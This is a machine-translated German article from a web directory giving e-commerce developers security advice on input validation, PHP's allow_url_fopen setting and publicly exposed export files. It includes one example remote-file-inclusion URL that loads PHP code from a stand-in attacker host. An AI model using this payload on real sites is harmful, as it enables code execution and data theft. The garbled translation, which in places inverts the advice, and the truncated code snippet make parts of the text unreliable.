E-Commerce-Sicherheit - Anschließen des Sicherheitslecks

"E-Commerce" Artikel
Article Directory Home

Alle Kategorien

Internet und E-Business

E-Commerce

E-Commerce-Sicherheit - Anschließen des Security Holes Von Experten Autor: Paul Roberts \| Artikel Zusammenfassung
Word Count: 520 Worte \| Aufrufe: 124 View (s)

Sicherheit im E-Commerce-Website muss ein wesentlicher Gesichtspunkt bei der Entwicklung von E-Commerce-Website oder Software. Ein Entwickler muss die Sicherheit aller Überlegungen bei der Gestaltung einer Website im Klaren sein. Mit E-Commerce immer mehr an der Tagesordnung in diesen Tagen, ist die Zahl der Angriffe auf die Sicherheit sicherlich erhöhen. Paranoia ist eine gesunde Sache für E-Commerce-Site-Entwickler, müssen wir stets auf dem Tor mit Fragen der Sicherheit und halten unsere Augen und Ohren offen. Auch wenn die folgenden Lücken ernst nehmen, wenn die folgenden Lücken vorhanden sind leicht zu beheben.

Im Folgenden sind einige Sicherheitsüberlegungen einbezogen werden bei der Entwicklung einer Website. Dieser Artikel bezieht sich nicht auf E-Diebstahl bitte, meine eigenen Artikel zu diesem Thema.

User-Eingang - jede Eingabe, ob es eine Menge eingeben werden, auf der Suche nach einem Produkt, Eingabe eines Namens usw., muss validiert werden, auf verdächtige Zeichen. Wenn dies nicht geschieht, ist es möglich, geben Sie "?>", die Schließung End-Tags von PHP und PHP-Code auszuführen.

Es ist viel sicherer damit von Ziffern und Zeichen az (Hauptstädte im Lieferumfang enthalten) und 0-9 und sonst nichts, anstatt eine Liste mit allen Zeichen, die nicht da sein sollte. Die Validierung Skript muss jedes Zeichen durch einen nach dem anderen zu blättern. Dies muss erreicht werden durch die Validierung in Server-Seite, nicht Javascript. Mit Server-Seite der Überprüfung von Eingaben ist wichtig, zum Schutz vor unerwünschten Zeichen

Es gibt einen weiteren wichtigen bei der Ausführung von PHP-Code. Bei der Verwendung von PHP gibt es eine Einstellung allow_url_fopen genannt, die das Öffnen von Dateien aus einem PHP-Skript ermöglicht. Diese Einstellung sollte deaktiviert werden, wenn es unbedingt nötig.

Stellen Sie sich vor Sie haben PHP-Skripte sowohl für Festnetz-Kopf-und Fußzeilen, und Ihre Webseiten, die Sie eingeben würden, in http://www.mysite.com/index.php?page=page2 zugreifen. Alles was es braucht ist ein böswilliger Benutzer ein Skript, indem Sie diese Parameter durch Eingabe von "run http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" mit PHP-Code in der Datei "hacker.txt". Man könnte alles passieren haben, PHP-Dateien lesen, löschen, wichtige Informationen gestohlen.

Wenn Sie nicht sicher sind, wenn diese Einstellung aktiviert oder deaktiviert ist, kopieren Sie bitte den folgenden PHP-Code in eine Text-Datei und laden Sie sie auf Ihrem Webserver:

phpinfo ();
?>

Wenn Sie Ihr Skript auf Ihrem Webserver zugreifen, sollten Sie über die Einstellung allow_url_fopen kommen unter Konfiguration.

Ein Computer nutzen, können unter normalen Umständen nicht finden, den Wert dieser Einstellung.

Seien Sie vorsichtig, der exportierten Daten wie Bestellungen, Produkte im CSV-Dateien und mySQL. Wenn diese Daten von einem Skript ausgeführt und ist auf dem Webserver unter einem gemeinsamen Dateinamen dh gehalten. http://www.mysite.com/admin/output_tables.csv. Dies ist nur dann wirklich ein Problem, wenn die exportierten Daten befindet sich in einer Datei in einem Verzeichnis, das öffentlich zugänglich ist. Es gibt zwei Möglichkeiten, dies zu verhindern Sicherheitslücke - Erster haben die Output-Datei durch ein Passwort geschütztes Verzeichnis, zweitens haben die Daten in einer HTML-Formular-Element textarea auf einem Skript befindet. Die Ladenbesitzer können dann kopieren Sie diese Informationen aus der Textdatei und erstellen Sie eine neue Datei auf ihrem Computer und fügen Sie die Informationen finden Sie hier.

Alles was es braucht ist ein Hacker auf diesem Dateinamen, indem Sie die E-Commerce-Software Demo-Website und suchen Sie nach den gleichen Dateinamen auf einem realen Ort zu finden.

Über den Autor / Autor Bio

Paul Roberts
Ich einen Software-Entwicklung spezialisiertes Unternehmen im E-Commerce, Suchmaschinen-Optimierung, Software-und Print-Schätzung genannt ROBO Design Solutions. Ich habe auch die Entwicklung Neuseeland E-Commerce-Lösungen und Software unter dem Namen ROBO Design.

Article Source: http://www.de.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

Article Submitted: 2008-06-05 | This Article has been viewed 124 times.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video How to Keep Your Computer Secure	Play Video Wie Check Security-Einstellungen in Windows Vista

More "E-Commerce" In Verbindung stehende Artikel

Im Folgenden sind weitere Beiträge zu den oben genannten Artikel aus der "E-Commerce"-Artikel Kategorie verbunden sind.

Die Menschen in den oben genannten Artikel interessiert "E-Commerce-Sicherheit - Anschließen des Security Holes" sind auch in den entsprechenden unten aufgeführten Artikeln interessiert:

Making the Most von Ihrem E-Commerce-Business

Der Betrieb eines E-Commerce ist nicht nur über das Halten Sie Ihre Website in Betrieb. Kunden verlassen sich auf Ihre Fähigkeit, sie per Telefon, Fax, E-Mail oder auf andere Weise zu dienen, und es verlangt von allen Ihren Systemen zu arbeiten, um in der Lage, Kundenwünsche zu erfüllen.

Am E-Commerce

Nur ein paar Tage wieder war ich mit einem Chat mit meinem Freund. Er feierte sein Baby's 1. Geburtstag und musste sich zwischen seiner Heimat in Kerala und Chennai, seinem Arbeitsplatz ausführen. Er und seine bessere Hälfte reiste zwischen diesen beiden Orten mindestens 4 Mal im letzten Monat ein.

Salehoo Marken oder weltweit?

Wenn Sie es bisher getan haben E-Commerce für jede Menge Zeit, würden Sie wissen müssen, dass es mehr als echte scamers Anbieter von Groß-Transporter Verzeichnis-Dienste. In der Welt des E-Business, Salehoo und in der Welt Marken sind sowohl seriöse Dienstleister, die Popularität in den letzten Jahren gewonnen haben.

Salehoo - ein treuer Grosshandel und Drop Ship Recource

Wenn Sie schon einmal ein Online-Händler wurden, haben Sie wahrscheinlich bereits über Salehoo gehört oder selbst verwendet es zu Ihrem Vorteil. Wenn Sie gerade erst anfangen, sich mit Ihrem Unternehmen, können Sie mit dem gemischten Salehoo verwechselt werden Bewertungen draußen. Nun lassen Sie uns einen Blick an, was Salehoo wirklich geht und der von ihnen angebotenen Dienstleistungen, die viele neigen zu übersehen.

E-Commerce The World's Neue Online-Shopping-Mall

Wie viele Menschen wissen Sie, dass etwas im Internet gekauft habe? Wenn Ihr wie ich eine ganze Reihe, deshalb E-Commerce der Welt neue Online-Einkaufszentrum ist. Aber wer führt diese Online-Einzelhandel? Menschen wie du und ich, deshalb ist dieses Geschäft boomt und wird auch jetzt Hochkonjunktur und weit in die Zukunft ist.

Begünstigt durch Drop Shipping Electronics Services

Wenn Sie ein großer Fan der neuesten elektronischen Produkte sind, können Sie von der Idee der Betrieb eines eigenen Online-Geschäft versucht werden. Es ist nicht so schwer zu beginnen, wenn Sie den vollen Vorteil der rechten Drop Shipping Service-Elektronik, und es gibt viel für Sie aus.

Die Vorteile zum Besitzen Sie Ihre Online-Retail Store

Haben Sie jemals in Ihrem örtlichen Supermarkt zu gehen und sich fragen, wie es wäre, wenn Sie in ihrem Besitz befinden würden? Würden Sie eine gute Eigentümer, die Menschen wie Sie? Nun diesem Artikel zeigen Ihnen die Vorteile, die Ihnen Ihren eigenen Online-Händler oder allgemein bekannt als E-Commerce, die von einem echten lokalen Supermarkt unterscheidet.

Artikel drucken

Lieblings-Artikel

E-Mail an einen Freund

Artikel veröffentlichen

Article Directory Home

Alle Kategorien

Internet und E-Business

E-Commerce

�

Haben Sie nicht gefunden, was Sie gesucht haben? Tipp: Google-Suche!

(Wir dienen weltweit - Standorte wie am Montag, der 07. Dezember 2009 05:33 Uhr aktualisiert, Singapur)

Vereinigten Staaten von Amerika, USA. Vereinigtes Königreich, Vereinigtes Königreich (England, Schottland, Wales, Nordirland). Kanada. Afghanistan. Albanien. Algerien. Amerikanisch-Samoa. Andorra. Angola. Anguilla. Antarktis. Antigua & Barbuda. Argentinien. Armenien. Aruba. Australien. Österreich. Aserbaidschan. Bahamas. Bahrain. Bangladesch. Barbados. Belarus. Belgien. Belize. Benin. Bermuda. Bhutan. Bolivien. Bonaire. Bosnien-Herzegowina. Botsuana. Brasilien. Britische Jungferninseln. Brunei Darrusalam. Bulgarien. Burkina Faso. Burundi. Kambodscha. Kamerun. Kap Verde. Cayman-Inseln. Zentralafrikanische Republik. Tschad. Kanalinseln. Chile. Porzellan. Weihnachtsinsel. Kolumbien. Komoren. Kongo. Kongo (Dem. Rep.). Cook-Inseln. Costa Rica. Cote d'Ivoire. Kroatien. Kuba. Curacao. Zypern. Tschechische Republik. Dänemark. Dschibuti. Dominica. Dominikanische Republik. Osttimor. Ecuador. Ägypten. El Salvador. Äquatorialguinea. Eritrea. Estland. Äthiopien. Falklandinseln und Abhängigkeiten. Färöer-Inseln. Fidschi. Finnland. Frankreich. Französisch-Guayana. Französisch-Polynesien. Gabun. Gambia. Gaza. Georgien. Deutschland. Ghana. Gibraltar. Griechenland. Grönland. Grenada. Guadeloupe. Guam. Guatemala. Guinea. Guinea-Bissau. Guyana. Haiti. Hawaii-Inseln. Honduras. Hongkong. Ungarn. Island. Indien. Indonesien. Iran. Irak. Isle of Man. Israel. Italien. Côte d'Ivoire. Jamaika. Japan. Johnston Atoll. Jordanien. Kasachstan. Kenia. Kiribati. Korea (Nord). Korea (Süd). Kuwait. Kirgisistan. Laos. Lettland. Libanon. Leeward-Inseln. Lesotho. Liberia. Libyen. Liechtenstein. Litauen. Luxemburg. Macau. Mazedonien. Madagaskar. Malawi. Malaysia. Malediven. Mali. Malta. Marshall-Inseln. Martinique. Mauretanien. Mauritius. Mexiko. Mikronesien (Federated States). Midway-Inseln. Republik Moldau. Monaco. Mongolei. Montserrat. Marokko. Mosquito Coast. Mosambik. Myanmar (Birma). Namibia. Nauru. Navassa Island. Nepal. Niederlande. Niederländische Antillen. Neukaledonien. Neuseeland. Nicaragua. Niger. Nigeria. Niue. Norfolk-Insel. Nördliche Marianen. Norwegen. Oman. Pakistan. Palau. Palästina. Panama. Papua-Neuguinea. Paracel-Inseln. Paraguay. Peru. Philippinen. Pitcairn-Inseln. Polen. Portugal. Puerto Rico. Katar. Reunion. Rumänien. Russland. Ruanda. Ryukyu-Inseln. St. Helena. St. Kitts und Nevis. St. Lucia. Saint Pierre & Miquelon. Saint Vincent und die Grenadinen. Samoa. San Marino. Sao Tome & Principe. Saudi-Arabien. Senegal. Serbien. Seychellen. Sierra Leone. Singapur. Slowakei. Slowenien. Salomonen. Somalia. Südafrika. Spanien. Sri Lanka. Sudan. Suriname. Swasiland. Schweden. Schweiz. Syrien. Taiwan. Tadschikistan. Tansania. Thailand. Togo. Tonga. Transkei. Trinidad & Tobago. Tunesien. Türkei. Turkmenistan. Turks-und Caicosinseln. Tuvalu. US-Jungferninseln. Uganda. Ukraine. Vereinigte Arabische Emirate. Obervolta. Uruguay. Usbekistan. Vanuatu. Vatikanstadt (Heiliger Stuhl). Venezuela. Vietnam. Wake Island. Windward-Inseln. Jemen. Jugoslawien. Zaire. Sambia. Simbabwe

Copyright © 2005 -- von Larry Lim, Singapur - Artikel Suchmaschine Verzeichnis auf ArticleSphere.com ™
Alle Rechte weltweit vorbehalten. Alle Warenzeichen und Dienstleistungsmarken sind Eigentum der jeweiligen Inhaber.